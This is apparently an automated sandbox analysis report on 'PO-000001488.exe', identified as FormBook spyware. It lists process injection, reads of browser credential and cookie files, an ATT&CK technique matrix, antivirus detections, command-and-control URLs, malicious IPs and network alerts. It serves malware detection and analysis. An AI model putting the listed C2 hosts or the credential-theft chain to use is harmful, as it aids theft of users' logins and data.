            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtAllocateVirtualMemory: Direct from: 0x774648EC
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtQuerySystemInformation: Direct from: 0x774648CC
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtQueryVolumeInformationFile: Direct from: 0x77462F2C
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtReadVirtualMemory: Direct from: 0x77462E8C
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtCreateKey: Direct from: 0x77462C6C
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtSetInformationThread: Direct from: 0x77462B4C
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtQueryAttributesFile: Direct from: 0x77462E6C
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtDeviceIoControlFile: Direct from: 0x77462AEC
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtOpenSection: Direct from: 0x77462E0C
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtCreateFile: Direct from: 0x77462FEC
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtOpenFile: Direct from: 0x77462DCC
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtQueryInformationToken: Direct from: 0x77462CAC
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtTerminateThread: Direct from: 0x77462FCC
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtAllocateVirtualMemory: Direct from: 0x77462BEC
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtOpenKeyEx: Direct from: 0x77462B9C
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: NULL target: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\PO-000001488.exe Section loaded: NULL target: C:\Windows\SysWOW64\userinit.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: NULL target: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe protection: read write
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: NULL target: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\userinit.exe Thread register set: target process: 4176
            Source: C:\Windows\SysWOW64\userinit.exe Thread APC queued: target process: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
            Source: C:\Users\user\Desktop\PO-000001488.exe Process created: C:\Users\user\Desktop\PO-000001488.exe "C:\Users\user\Desktop\PO-000001488.exe"
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe Process created: C:\Windows\SysWOW64\userinit.exe "C:\Windows\SysWOW64\userinit.exe"
            Source: C:\Windows\SysWOW64\userinit.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: MpfhURuSBZcuS.exe, 00000007.00000002.3308609736.0000000001811000.00000002.00000001.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000007.00000000.1691525210.0000000001810000.00000002.00000001.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3308661892.00000000017C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: MpfhURuSBZcuS.exe, 00000007.00000002.3308609736.0000000001811000.00000002.00000001.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000007.00000000.1691525210.0000000001810000.00000002.00000001.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3308661892.00000000017C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: MpfhURuSBZcuS.exe, 00000007.00000002.3308609736.0000000001811000.00000002.00000001.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000007.00000000.1691525210.0000000001810000.00000002.00000001.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3308661892.00000000017C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: 0Program Manager
            Source: MpfhURuSBZcuS.exe, 00000007.00000002.3308609736.0000000001811000.00000002.00000001.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000007.00000000.1691525210.0000000001810000.00000002.00000001.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3308661892.00000000017C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\PO-000001488.exe Queries volume information: C:\Users\user\Desktop\PO-000001488.exe VolumeInformation
            Source: C:\Users\user\Desktop\PO-000001488.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO-000001488.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO-000001488.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO-000001488.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO-000001488.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO-000001488.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match File source: 3.2.PO-000001488.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 3.2.PO-000001488.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000008.00000002.3308944674.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.1769630236.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.3308999188.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.1770519170.0000000003FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000009.00000002.3311216289.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\userinit.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\userinit.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\userinit.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\userinit.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\userinit.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\userinit.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\userinit.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\userinit.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\userinit.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match File source: 3.2.PO-000001488.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 3.2.PO-000001488.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000008.00000002.3308944674.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.1769630236.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.3308999188.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.1770519170.0000000003FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000009.00000002.3311216289.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 312 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            [Behavior graph: Behavior Graph ID: 1516889, Sample: PO-000001488.exe, Startdate: 24/09/2024, Architecture: WINDOWS, Score: 100]

            Source | Detection | Scanner | Label | Link
            PO-000001488.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.Leonem |
            PO-000001488.exe | 100% | Avira | HEUR/AGEN.1308792 |
            PO-000001488.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            Name | Malicious | Antivirus Detection | Reputation
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.popin.space/x7gz/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.airtech365.net/i5ct/?L4Ml=Fa741987AWI4ml8JbykgJhLldRSV8MLMClq6YX0bCrkU+JaoPzqjDuf6Icle9aauT7Lw6ndlbIEz9rGtX42qIZx9WxYPHsy+7TyOZv7jOElLtueXdtfrjEJRdY8SctMF/g==&VX=XZGx-true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.suarahati20.xyz/tuad/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.dhkatp.vip/u85y/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.donante-de-ovulos.biz/8lrv/true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.eslameldaramlly.site/30vc/?L4Ml=koLtGNOu6/mtotP2N90Ew8ZnZ5AtrYolTy+nHYpgZByzVo0p/pJDl5mHD5S71z13e/5SfuBUTFBQZBIfTtXqOOjASHRAzkUFzB/tE7NVhPpefWhKcPM/9ZcforBBDyLF2Q==&VX=XZGx-true
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.pofgof.pro/gfz9/true
                                                    • Avira URL Cloud: safe
                                                    unknown
IP | Domain | Country | ASN | ASN Name | Malicious
209.74.95.29 | www.pofgof.pro | United States | 31744 | MULTIBAND-NEWHOPEUS | true
188.114.97.3 | www.cc101.pro | European Union | 13335 | CLOUDFLARENETUS | true
198.252.106.191 | suarahati20.xyz | Canada | 20068 | HAWKHOSTCA | true
199.59.243.227 | 94950.bodis.com | United States | 395082 | BODIS-NJUS | true
52.223.13.41 | www.longfilsalphonse.net | United States | 8987 | AMAZONEXPANSIONGB | true
38.47.232.144 | yu35n.top | United States | 174 | COGENT-174US | true
3.33.130.190 | airtech365.net | United States | 8987 | AMAZONEXPANSIONGB | true
148.251.114.233 | eslameldaramlly.site | Germany | 24940 | HETZNER-ASDE | true
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1516889
                                                    Start date and time:2024-09-24 17:15:29 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 10m 15s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Run name:Run with higher sleep bypass
                                                    Number of analysed new started processes analysed:12
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:2
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:PO-000001488.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@13/8
                                                    EGA Information:
                                                    • Successful, ratio: 75%
                                                    HCA Information:
                                                    • Successful, ratio: 96%
                                                    • Number of executed functions: 98
                                                    • Number of non-executed functions: 291
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target MpfhURuSBZcuS.exe, PID 5996 because it is empty
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: PO-000001488.exe
Time | Type | Description
11:17:36 | API Interceptor | 5851615x Sleep call for process: userinit.exe modified
                                                    Process:C:\Users\user\Desktop\PO-000001488.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.34331486778365
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                    Process:C:\Windows\SysWOW64\userinit.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                    Category:dropped
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.1209886597424439
                                                    Encrypted:false
                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                    MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                    SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                    SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                    SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.811653589930509
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:PO-000001488.exe
                                                    File size:892'928 bytes
                                                    MD5:ddc551bb780301787ee4cc982af331a9
                                                    SHA1:06ddf68af0fdfdb756cf876c36a183f3411166f0
                                                    SHA256:557195c150cfc25ab58399c7067bd4abf90afa511b68c5ad6bddcc829e1455b0
                                                    SHA512:56f5753bca14671269085cb7c9e8d986ff2d171ccad139cd980a9859facd4fa1409d6312e4eabfa59a7ba60d6f01de324392301de7d4a0d3e18b8da7040732fc
                                                    SSDEEP:24576:cQwxlaI5GFW+LCUhvxTh5fbDMo/GlgVF:cQwxlaIeCUhZTh5DQ6
                                                    TLSH:DC150151352D9F02D4B40BF50871D0F583F9AEAEE521F7068EC63EDB387AB041A55A8B
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..|..."........... ........@.. ....................................@................................
                                                    Icon Hash:0f08caa5c4da180f
                                                    Entrypoint:0x4d9bda
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x66F0C8EB [Mon Sep 23 01:48:27 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                    Instruction
                                                    jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd9b88 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xda000 | 0x1fe4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xdc000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xd7be0 | 0xd7c00 | 69fa950490931b853a3002848cb1c362 | False | 0.8983831836616454 | data | 7.8168604118663545 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xda000 | 0x1fe4 | 0x2000 | 69b58681b645cab1731c2560eecbc7e7 | False | 0.8956298828125 | data | 7.48483490489359 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xdc000 | 0xc | 0x200 | 1b7da73528e5716b69e963b21aeba89a | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xda0c8 | 0x1bd8 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9667508417508418
RT_GROUP_ICON | 0xdbcb0 | 0x14 | data | | | 1.05
RT_VERSION | 0xdbcd4 | 0x30c | data | | | 0.4307692307692308
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-24T17:17:19.548794+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 63689 | 188.114.97.3 | 80 | TCP
2024-09-24T17:17:43.191949+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 63693 | 199.59.243.227 | 80 | TCP
2024-09-24T17:17:56.931031+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 63700 | 198.252.106.191 | 80 | TCP
2024-09-24T17:18:10.103482+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 63704 | 3.33.130.190 | 80 | TCP
2024-09-24T17:18:23.779067+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 63708 | 148.251.114.233 | 80 | TCP
2024-09-24T17:18:37.074245+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 63712 | 209.74.95.29 | 80 | TCP
2024-09-24T17:18:50.786085+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 63716 | 199.59.243.227 | 80 | TCP
2024-09-24T17:19:03.958791+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 63720 | 3.33.130.190 | 80 | TCP
2024-09-24T17:19:25.919517+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 63724 | 52.223.13.41 | 80 | TCP
2024-09-24T17:19:40.565485+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 63728 | 38.47.232.144 | 80 | TCP
                                                    Sep 24, 2024 17:18:07.070147038 CEST6370380192.168.2.83.33.130.190
                                                    Sep 24, 2024 17:18:07.075517893 CEST80637033.33.130.190192.168.2.8
                                                    Sep 24, 2024 17:18:07.075630903 CEST6370380192.168.2.83.33.130.190
                                                    Sep 24, 2024 17:18:07.087567091 CEST6370380192.168.2.83.33.130.190
                                                    Sep 24, 2024 17:18:07.092638969 CEST80637033.33.130.190192.168.2.8
                                                    Sep 24, 2024 17:18:07.093420029 CEST80637033.33.130.190192.168.2.8
                                                    Sep 24, 2024 17:18:07.548043013 CEST80637033.33.130.190192.168.2.8
                                                    Sep 24, 2024 17:18:07.548247099 CEST6370380192.168.2.83.33.130.190
                                                    Sep 24, 2024 17:18:08.597960949 CEST6370380192.168.2.83.33.130.190
                                                    Sep 24, 2024 17:18:08.603133917 CEST80637033.33.130.190192.168.2.8
                                                    Sep 24, 2024 17:18:09.616569996 CEST6370480192.168.2.83.33.130.190
                                                    Sep 24, 2024 17:18:09.621743917 CEST80637043.33.130.190192.168.2.8
